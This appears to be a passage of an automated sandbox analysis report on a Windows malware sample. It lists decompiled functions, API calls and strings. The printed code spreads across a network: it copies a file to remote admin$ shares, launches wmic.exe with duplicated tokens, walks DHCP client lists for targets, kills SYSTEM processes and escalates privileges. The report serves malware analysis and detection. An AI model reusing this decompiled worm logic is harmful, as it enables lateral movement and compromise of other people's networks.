0x007b9d96
0x007b9d98
0x007b9eb0
0x00000000
0x007b9d9e
0x007b9daa
0x007b9dbd
0x007b9dbf
0x007b9ebe
0x007b9ec5
0x007b9ecf
0x007b9ecf
0x007b9ed2
0x007b9ed7
0x007b9ed9
0x007b9ed9
0x007b9edc
0x007b9edf
0x007b9ee4
0x007b9ee4
0x007b9ee8
0x007b9ee8
0x007b9ee9
0x007b9ee9
0x007b9eed
0x007b9ef9
0x007b9ef9
0x00000000
0x007b9eed
0x007b9ded
0x007b9df2
0x007b9df4
0x007b9ea6
0x007b9ea6
0x007b9eac
0x007b9eb6
0x007b9eb6
0x007b9eb9
0x007b9eb9
0x007b9ebc
0x00000000
0x00000000
0x00000000
0x007b9ebc
0x007b9dfd
0x007b9e03
0x007b9e04
0x007b9e05
0x007b9e06
0x007b9e0b
0x007b9e0c
0x007b9e13
0x007b9e14
0x007b9e1b
0x007b9e1c
0x007b9e1f
0x007b9e2c
0x007b9e21
0x007b9e24
0x007b9e24
0x007b9e32
0x007b9e34
0x00000000
0x007b9e36
0x007b9e3b
0x007b9e48
0x007b9e4b
0x007b9e51
0x007b9e54
0x007b9e59
0x007b9e59
0x007b9e5b
0x007b9e5e
0x007b9e63
0x007b9e63
0x007b9e65
0x007b9e68
0x007b9e6d
0x007b9e6d
0x007b9e6f
0x007b9e72
0x007b9e77
0x007b9e77
0x007b9e79
0x007b9e7c
0x007b9e81
0x007b9e81
0x007b9e85
0x007b9e88
0x007b9e8b
0x007b9e8e
0x007b9e90
0x007b9ecd
0x007b9ecd
0x00000000
0x007b9e92
0x007b9e9f
0x007b9ea2
0x00000000
0x007b9ea2
0x007b9e90
0x007b9e34
0x007b9d98
0x007b9c9a
0x007b9ca0
0x007b9ca6
0x00000000
0x007b9ccb
0x007b9cce
0x00000000
0x00000000
0x007b9cdd
0x007b9ce3
0x00000000
0x007b9ce3
0x007b9ca6
0x007b9ceb
0x00000000

APIs

wsprintfW.USER32 ref: 007B9BA5

Part of subcall function 007B88D3: PathFindFileNameW.SHLWAPI(007C7BC8,76B5C0B0,?,007B95B2), ref: 007B88E3

wsprintfW.USER32 ref: 007B9BF2
wsprintfW.USER32 ref: 007B9C16
PathFindExtensionW.SHLWAPI(?), ref: 007B9C22
wsprintfW.USER32 ref: 007B9C41
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007B9C59
PathFileExistsW.SHLWAPI(?), ref: 007B9C69
GetLastError.KERNEL32 ref: 007B9C73
GetLastError.KERNEL32(?), ref: 007B9C9A
WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B9CDD
GetCurrentThread.KERNEL32 ref: 007B9D1B
OpenThreadToken.ADVAPI32(00000000), ref: 007B9D22
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 007B9D3C
memset.MSVCRT ref: 007B9D62
GetSystemDirectoryW.KERNEL32 ref: 007B9D8A
PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 007B9DAA
PathFileExistsW.SHLWAPI(?), ref: 007B9DB7
wsprintfW.USER32 ref: 007B9DD8
CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 007B9E24
CreateProcessW.KERNEL32 ref: 007B9E2C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 007B9E3B
GetExitCodeProcess.KERNEL32 ref: 007B9E4B
CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E59
CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E63
CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E6D
CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E77
CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E81
PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 007B9E99
GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 007B9EA6
DeleteFileW.KERNEL32(?), ref: 007B9EC5
CloseHandle.KERNEL32(?), ref: 007B9ED7
CloseHandle.KERNEL32(?), ref: 007B9EE4

Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 007B68EB
Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B68F4
Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6921
Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 007B6946
Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B6949
Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6978
Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 007B6995
Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B6998
Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 007B699F
Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B69A2

WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B9EF9
SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,007B9FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 007B9F17

Strings

wbem\wmic.exe, xrefs: 007B9D9E
W, xrefs: 007B9F01
\\%ws\admin$\%ws, xrefs: 007B9BE5, 007B9BF0, 007B9C14, 007B9C3F
%ws , xrefs: 007B9DD2
\\%s\admin$, xrefs: 007B9B9F
D, xrefs: 007B9D7C
cscc.dat, xrefs: 007B9C31

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
API String ID: 659518118-2685502051
Opcode ID: 0c90158c84ac73c9c373b55f8eb737069118f8e7c3344132d1641ce551ba46cb
Instruction ID: bedfb7a681dfb6271774d34ac95572ba15a833f966678e5d98b578caca79eec5
Opcode Fuzzy Hash: 0c90158c84ac73c9c373b55f8eb737069118f8e7c3344132d1641ce551ba46cb
Instruction Fuzzy Hash: 81B1F771900219EFCF61DFA4CC88FEEBBB9BF44314F14456AE619A2120E7389A84DF55

Uniqueness

Uniqueness Score: -1.00%

Function 007B8D39 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 130
memoryCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E007B8D39(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				char _v20;
				signed int _v24;
				long _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v584;
				void* __esi;
				char* _t58;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr _t71;
				intOrPtr _t73;
				signed int _t83;
				intOrPtr* _t85;
				void* _t86;
				signed int _t88;
				intOrPtr* _t89;

				_t83 = 0;
				_t88 = 0;
				_v48 = 0;
				_v44 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v28 = 0;
				_v24 = 0;
				_v32 = 0;
				_v40 = 0;
				_v36 = 0;
				_v64 = 0;
				_v56 = 0x104;
				__imp__GetComputerNameExW(4,  &_v584,  &_v56);
				_t58 =  &_v584;
				__imp__DhcpEnumSubnets(_t58,  &_v48, 0x400,  &_v12,  &_v32,  &_v40);
				if(_t58 != 0) {
					L15:
					return 0;
				}
				_t61 =  *_v12;
				_v60 = _t61;
				if(_t61 <= 0) {
					L14:
					__imp__DhcpRpcFreeMemory(_v12);
					goto L15;
				} else {
					goto L2;
				}
				do {
					L2:
					_t64 =  *((intOrPtr*)(_v12 + 4));
					__imp__DhcpGetSubnetInfo(0,  *((intOrPtr*)(_t64 + _t83 * 4)),  &_v20);
					if(_t64 == 0 &&  *((intOrPtr*)(_v20 + 0x1c)) == 0) {
						_t71 =  *((intOrPtr*)(_v12 + 4));
						__imp__DhcpEnumSubnetClients(0,  *((intOrPtr*)(_t71 + _t83 * 4)),  &_v44, 0x10000,  &_v16,  &_v36,  &_v64);
						if(_t71 != 0) {
							goto L13;
						}
						_t73 =  *_v16;
						_v52 = _t73;
						if(_t73 == 0 || _t88 >= _t73) {
							L12:
							__imp__DhcpRpcFreeMemory(_v16);
							goto L13;
						} else {
							do {
								_t89 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _t88 * 4));
								if(_t89 != 0) {
									_push( *_t89);
									_t85 = __imp__#14;
									if(E007BA567( *_t85()) != 0) {
										__imp__#12( *_t85( *_t89));
										_t86 = E007B641A(_t78);
										if(_t86 != 0) {
											E007B6B95(_t79, 0, _a4);
											HeapFree(GetProcessHeap(), 0, _t86);
										}
									}
								}
								_t88 = _v24 + 1;
								_v24 = _t88;
							} while (_t88 < _v52);
							goto L12;
						}
					}
					L13:
					_t83 = _v28 + 1;
					_v28 = _t83;
				} while (_t83 < _v60);
				goto L14;
			}

0x007b8d52
0x007b8d54
0x007b8d58
0x007b8d5b
0x007b8d5e
0x007b8d61
0x007b8d64
0x007b8d67
0x007b8d6a
0x007b8d6d
0x007b8d70
0x007b8d73
0x007b8d76
0x007b8d79
0x007b8d80
0x007b8d9b
0x007b8da2
0x007b8daa
0x007b8ea2
0x007b8ea6
0x007b8ea6
0x007b8db3
0x007b8db5
0x007b8dba
0x007b8e97
0x007b8e9a
0x00000000
0x00000000
0x00000000
0x00000000
0x007b8dc0
0x007b8dc0
0x007b8dc7
0x007b8dce
0x007b8dd6
0x007b8e00
0x007b8e07
0x007b8e0f
0x00000000
0x00000000
0x007b8e14
0x007b8e16
0x007b8e1b
0x007b8e7e
0x007b8e81
0x00000000
0x007b8e21
0x007b8e21
0x007b8e27
0x007b8e2c
0x007b8e2e
0x007b8e30
0x007b8e40
0x007b8e47
0x007b8e53
0x007b8e57
0x007b8e5e
0x007b8e6c
0x007b8e6c
0x007b8e57
0x007b8e40
0x007b8e75
0x007b8e76
0x007b8e79
0x00000000
0x007b8e21
0x007b8e1b
0x007b8e87
0x007b8e8a
0x007b8e8b
0x007b8e8e
0x00000000

APIs

GetComputerNameExW.KERNEL32(00000004,?,?,00000000,7404C4E0,00000000), ref: 007B8D80
DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 007B8DA2
DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 007B8DCE
DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 007B8E07
htonl.WS2_32(00000000), ref: 007B8E36
htonl.WS2_32(00000000), ref: 007B8E44
inet_ntoa.WS2_32(00000000), ref: 007B8E47

Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
Part of subcall function 007B641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
Part of subcall function 007B641A: HeapAlloc.KERNEL32(00000000), ref: 007B644D
Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 007B8E65
HeapFree.KERNEL32(00000000), ref: 007B8E6C
DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 007B8E81
DhcpRpcFreeMemory.DHCPSAPI(?), ref: 007B8E9A

Strings

Oet Uet0Xet, xrefs: 007B8E65

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
String ID: Oet Uet0Xet
API String ID: 4121633671-3175316637
Opcode ID: dc8f6a93adee31791339dfcc7c42e396f08073a1bacb6bac896949b243690bfd
Instruction ID: e122dd0c82d35ae19a3129bced7a63731965bcbe0ad78da6addd888b221c0bb0
Opcode Fuzzy Hash: dc8f6a93adee31791339dfcc7c42e396f08073a1bacb6bac896949b243690bfd
Instruction Fuzzy Hash: 6341B6B5D00219AFCB11DFA9D884EDEBBBCFF48300F148156E501E7220EB789A41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 007B57E5 Relevance: 18.2, APIs: 12, Instructions: 160
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E007B57E5(long _a4, void _a8, void* _a12, intOrPtr _a16) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				struct _TIME_ZONE_INFORMATION _v192;
				void** _t62;
				void* _t66;
				long _t69;
				signed int _t73;
				signed int _t74;
				void* _t88;
				void* _t91;
				void* _t96;
				int _t101;
				long _t102;
				int _t103;
				void _t104;
				void _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;

				_t109 = 0;
				_v20 = 0;
				if(_a16 != 0) {
					_t96 = LocalAlloc(0x40, 0xf0);
					_v12 = _t96;
					if(_t96 != 0) {
						 *_t96 = _a8;
						 *((intOrPtr*)(_t96 + 4)) = GetSystemDefaultLCID();
						if(GetTimeZoneInformation( &_v192) != 0xffffffff) {
							 *(_t96 + 8) = _v192.Bias;
						}
						_t10 = _t96 + 0xc; // 0xc
						memcpy(_t10, _a12, 0x21);
						_t116 = _t115 + 0xc;
						_t62 =  &_v16;
						_v16 = _t109;
						__imp__NetWkstaGetInfo(0x7c0494, 0x64, _t62, _t111);
						if(_t62 == 0) {
							_t114 = _v16;
							if( *(_t114 + 8) != _t109) {
								_t91 =  *(_t114 + 8);
								_t108 = _t91 + 2;
								do {
									_t105 =  *_t91;
									_t91 = _t91 + 2;
								} while (_t105 != _t109);
								_t109 = (_t91 - _t108 >> 1) + (_t91 - _t108 >> 1) + 2;
							}
							_t101 = 0;
							if( *(_t114 + 4) != 0) {
								_t88 =  *(_t114 + 4);
								_t107 = _t88 + 2;
								do {
									_t104 =  *_t88;
									_t88 = _t88 + 2;
								} while (_t104 != 0);
								_t101 = (_t88 - _t107 >> 1) + (_t88 - _t107 >> 1) + 2;
							}
							if(_t109 != 0 && _t109 <= 0xc3) {
								memcpy(_v12 + 0x2d,  *(_t114 + 8), _t109);
								_t116 = _t116 + 0xc;
							}
							if(_t101 != 0 && _t101 <= 0xc3 - _t109) {
								_t29 = _v12 + 0x2d; // 0x2d
								memcpy(_t109 + _t29,  *(_t114 + 4), _t101);
								_t116 = _t116 + 0xc;
							}
							NetApiBufferFree(_t114);
							_t96 = _v12;
							_t109 = 0;
						}
						_a12 = _t109;
						_v8 = _t109;
						if(E007B56D8( &_v8, _a4, _t96,  &_a12) != 0) {
							_t69 = _v8 + 9;
							_a4 = _t69;
							_t113 = LocalAlloc(0x40, _t69);
							if(_t113 != _t109) {
								 *(_t113 + 1) = _a8;
								 *_t113 = 0x66;
								_t41 = _t113 + 5; // 0x5
								_t73 = memcpy(_t41, _a12, _v8);
								_t103 = _v8;
								_t106 = _t103 + 5;
								_t74 = _t73 | 0xffffffff;
								_t110 = _t113;
								if(_t106 != 0) {
									do {
										_t74 = _t74 >> 0x00000008 ^  *(0x7c3078 + (( *_t110 & 0x000000ff ^ _t74) & 0x000000ff) * 4);
										_t110 = _t110 + 1;
										_t106 = _t106 - 1;
									} while (_t106 != 0);
									_t96 = _v12;
								}
								 *(_t113 + _t103 + 5) =  !_t74;
								_v20 = E007B5780(_t103, _t113, _a4, _a16);
								LocalFree(_t113);
							}
						}
						_t102 = 0xf0;
						_t66 = _t96;
						do {
							 *_t66 = 0;
							_t66 = _t66 + 1;
							_t102 = _t102 - 1;
						} while (_t102 != 0);
						LocalFree(_t96);
					}
				}
				return _v20;
			}

0x007b57ef
0x007b57f1
0x007b57f7
0x007b580b
0x007b580d
0x007b5812
0x007b581b
0x007b5823
0x007b5836
0x007b583e
0x007b583e
0x007b5847
0x007b584b
0x007b5850
0x007b5853
0x007b585e
0x007b5861
0x007b5869
0x007b586f
0x007b5875
0x007b5877
0x007b587a
0x007b587d
0x007b587d
0x007b5880
0x007b5883
0x007b588c
0x007b588c
0x007b5890
0x007b5895
0x007b5897
0x007b589a
0x007b589d
0x007b589d
0x007b58a0
0x007b58a3
0x007b58ac
0x007b58ac
0x007b58b2
0x007b58c7
0x007b58cc
0x007b58cc
0x007b58d1
0x007b58e5
0x007b58ea
0x007b58ef
0x007b58ef
0x007b58f3
0x007b58f9
0x007b58fc
0x007b58fc
0x007b5909
0x007b590c
0x007b5916
0x007b591b
0x007b5921
0x007b592a
0x007b592e
0x007b5933
0x007b5936
0x007b593c
0x007b5943
0x007b5948
0x007b594b
0x007b5951
0x007b5954
0x007b5958
0x007b595a
0x007b5968
0x007b596f
0x007b5970
0x007b5970
0x007b5973
0x007b5973
0x007b597e
0x007b5989
0x007b598c
0x007b598c
0x007b592e
0x007b5992
0x007b5997
0x007b599a
0x007b599a
0x007b599d
0x007b599e
0x007b599e
0x007b59a2
0x007b59a2
0x007b59a8
0x007b59ae

APIs

LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 007B5805
GetSystemDefaultLCID.KERNEL32 ref: 007B581D
GetTimeZoneInformation.KERNEL32(?), ref: 007B582D
memcpy.MSVCRT ref: 007B584B
NetWkstaGetInfo.NETAPI32(007C0494,00000064,?), ref: 007B5861
memcpy.MSVCRT ref: 007B58C7
memcpy.MSVCRT ref: 007B58EA
NetApiBufferFree.NETAPI32(?,?,?,?), ref: 007B58F3
LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 007B5924
memcpy.MSVCRT ref: 007B5943
LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 007B598C
LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 007B59A2

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
String ID:
API String ID: 2529142246-0
Opcode ID: 0a39d90b406feda998e8275bbe02637dcb7a10c8abc7545437dec6b342289924
Instruction ID: b20317f9d52e37e4031fdbe545145722a57ef1227c3d54dfb1def7c39a794b84
Opcode Fuzzy Hash: 0a39d90b406feda998e8275bbe02637dcb7a10c8abc7545437dec6b342289924
Instruction Fuzzy Hash: 2C51BF7190070AEFDB20DF68CC84FEABBA9FF48314F058569E9559B251E778EA10CB50

Uniqueness

Uniqueness Score: -1.00%

Function 007B841D Relevance: 16.6, APIs: 11, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E007B841D(int _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				short _v20;
				struct _SID_IDENTIFIER_AUTHORITY _v24;
				long _t20;
				int _t21;
				long* _t31;
				void* _t38;

				if(( *0x7c7bc0 & 0x00000002) != 0) {
					_t20 = GetCurrentProcessId();
					if(_a4 != _t20) {
						_t21 = OpenProcess(0x401, 0, _a4);
						_t38 = _t21;
						if(_t38 != 0) {
							if(OpenProcessToken(_t38, 0xe,  &_v16) != 0) {
								if(DuplicateToken(_v16, 2,  &_v12) != 0) {
									_v24.Value = 0;
									_v20 = 0x500;
									if(AllocateAndInitializeSid( &_v24, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v8) != 0) {
										_t31 =  &_a4;
										_a4 = 0;
										__imp__CheckTokenMembership(_v12, _v8, _t31);
										if(_t31 != 0 && _a4 != 0) {
											TerminateProcess(_t38, 0);
										}
										FreeSid(_v8);
									}
									CloseHandle(_v12);
								}
								CloseHandle(_v16);
							}
							_t21 = CloseHandle(_t38);
						}
						return _t21;
					}
				}
				return _t20;
			}

0x007b842a
0x007b8430
0x007b8439
0x007b844c
0x007b8452
0x007b8456
0x007b8472
0x007b8485
0x007b849a
0x007b849d
0x007b84ab
0x007b84ad
0x007b84b4
0x007b84ba
0x007b84c2
0x007b84cb
0x007b84cb
0x007b84d4
0x007b84d4
0x007b84dd
0x007b84dd
0x007b84e2
0x007b84e2
0x007b84e5
0x007b84e7
0x00000000
0x007b84e9
0x007b8439
0x007b84eb

APIs

GetCurrentProcessId.KERNEL32(?,007B8555,?,?), ref: 007B8430
OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,007B8555,?,?), ref: 007B844C
OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,007B8555,?,?), ref: 007B8464
DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,007B8555,?,?), ref: 007B847D
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B84A3
CheckTokenMembership.ADVAPI32(?,?,?), ref: 007B84BA
TerminateProcess.KERNEL32(00000000,00000000), ref: 007B84CB
FreeSid.ADVAPI32(?), ref: 007B84D4
CloseHandle.KERNEL32(?), ref: 007B84DD
CloseHandle.KERNEL32(?,?,?,?,007B8555,?,?), ref: 007B84E2
CloseHandle.KERNEL32(00000000,?,?,?,007B8555,?,?), ref: 007B84E5

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
String ID:
API String ID: 2191316301-0
Opcode ID: 8c70a0a0cec7e759b764b5654fa9c1de6ec07194a685ec838999abb6b03c0231
Instruction ID: 46d23b690306a084b1ca45259583d6dbbb3c93ddbbb3214c66e3c27868c3beae
Opcode Fuzzy Hash: 8c70a0a0cec7e759b764b5654fa9c1de6ec07194a685ec838999abb6b03c0231
Instruction Fuzzy Hash: F221187590014DBFEB60AFA4DC88FAE7B7CEF04781F008126FA01A1060EB788E45DB65

Uniqueness

Uniqueness Score: -1.00%

Function 007B7CC5 Relevance: 9.1, APIs: 6, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E007B7CC5(WCHAR* _a4) {
				void* _v8;
				int _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				long _t23;
				int _t24;

				_v28.PrivilegeCount = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 = 0;
				_v12 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0 && LookupPrivilegeValueW(0, _a4,  &(_v28.Privileges)) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					_t24 = AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0, 0);
					_t23 = GetLastError();
					_v12 = _t23;
					if(_t23 != 0) {
						_t24 = 0;
					}
				}
				SetLastError(_v12);
				return _t24;
			}

0x007b7cd2
0x007b7cd8
0x007b7cd9
0x007b7cda
0x007b7ce1
0x007b7ce3
0x007b7ce6
0x007b7cf8
0x007b7d17
0x007b7d1e
0x007b7d2b
0x007b7d2d
0x007b7d33
0x007b7d38
0x007b7d3a
0x007b7d3a
0x007b7d38
0x007b7d3f
0x007b7d4b

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,007B79E8), ref: 007B7CE9
OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,007B79E8), ref: 007B7CF0
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007B7D02
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007B7D25
GetLastError.KERNEL32(?,00000000), ref: 007B7D2D
SetLastError.KERNEL32(?,?,00000000,?,?,?,007B79E8), ref: 007B7D3F

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2365211911-0
Opcode ID: f9f05ae00a8bb55cbc6e983a6fe384f9e659bd9dca72889af1b1118afc00af72
Instruction ID: 2f349d498204f5ee39f75b4333620107fd8ac0bcddec6574d39f5e2954dc52b1
Opcode Fuzzy Hash: f9f05ae00a8bb55cbc6e983a6fe384f9e659bd9dca72889af1b1118afc00af72
Instruction Fuzzy Hash: 6911FA75A01218BFDB10AFE5DC48AEFBEBCEF48750F104525EA05E2150D6788A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 007B559B Relevance: 9.1, APIs: 6, Instructions: 54
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E007B559B(intOrPtr _a4) {
				long _v8;
				char _v12;
				char _v16;
				void* _v20;
				void* _t19;
				intOrPtr* _t25;

				_t25 = __imp__CryptSetKeyParam;
				_v12 = 1;
				 *_t25(_a4, 4,  &_v12, 0);
				_v16 = 1;
				 *_t25(_a4, 3,  &_v16, 0);
				_t19 =  &_v8;
				_v8 = 0;
				__imp__CryptGetKeyParam(_a4, 1, 0, _t19, 0);
				if(_t19 != 0 && _v8 != 0) {
					_t19 = LocalAlloc(0x40, _v8);
					_v20 = _t19;
					if(_t19 != 0) {
						 *_t25(_a4, 1, _t19, 0);
						return LocalFree(_v20);
					}
				}
				return _t19;
			}

0x007b55a3
0x007b55b9
0x007b55bc
0x007b55c8
0x007b55cb
0x007b55ce
0x007b55d7
0x007b55da
0x007b55e2
0x007b55ee
0x007b55f4
0x007b55f9
0x007b5601
0x00000000
0x007b5606
0x007b55f9
0x007b5610

APIs

CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 007B55BC
CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 007B55CB
CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 007B55DA
LocalAlloc.KERNEL32(00000040,?), ref: 007B55EE
CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 007B5601
LocalFree.KERNEL32(?), ref: 007B5606

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CryptParam$Local$AllocFree
String ID:
API String ID: 3966954206-0
Opcode ID: f45828bc66528bb5b8798c835f8c9b86466ad23daa17a795bf232d0e99978e84
Instruction ID: fde24e0806b6a1fa7ec85fd6d8c298c8a23e6807707d55baf883cd1d0f39a71b
Opcode Fuzzy Hash: f45828bc66528bb5b8798c835f8c9b86466ad23daa17a795bf232d0e99978e84
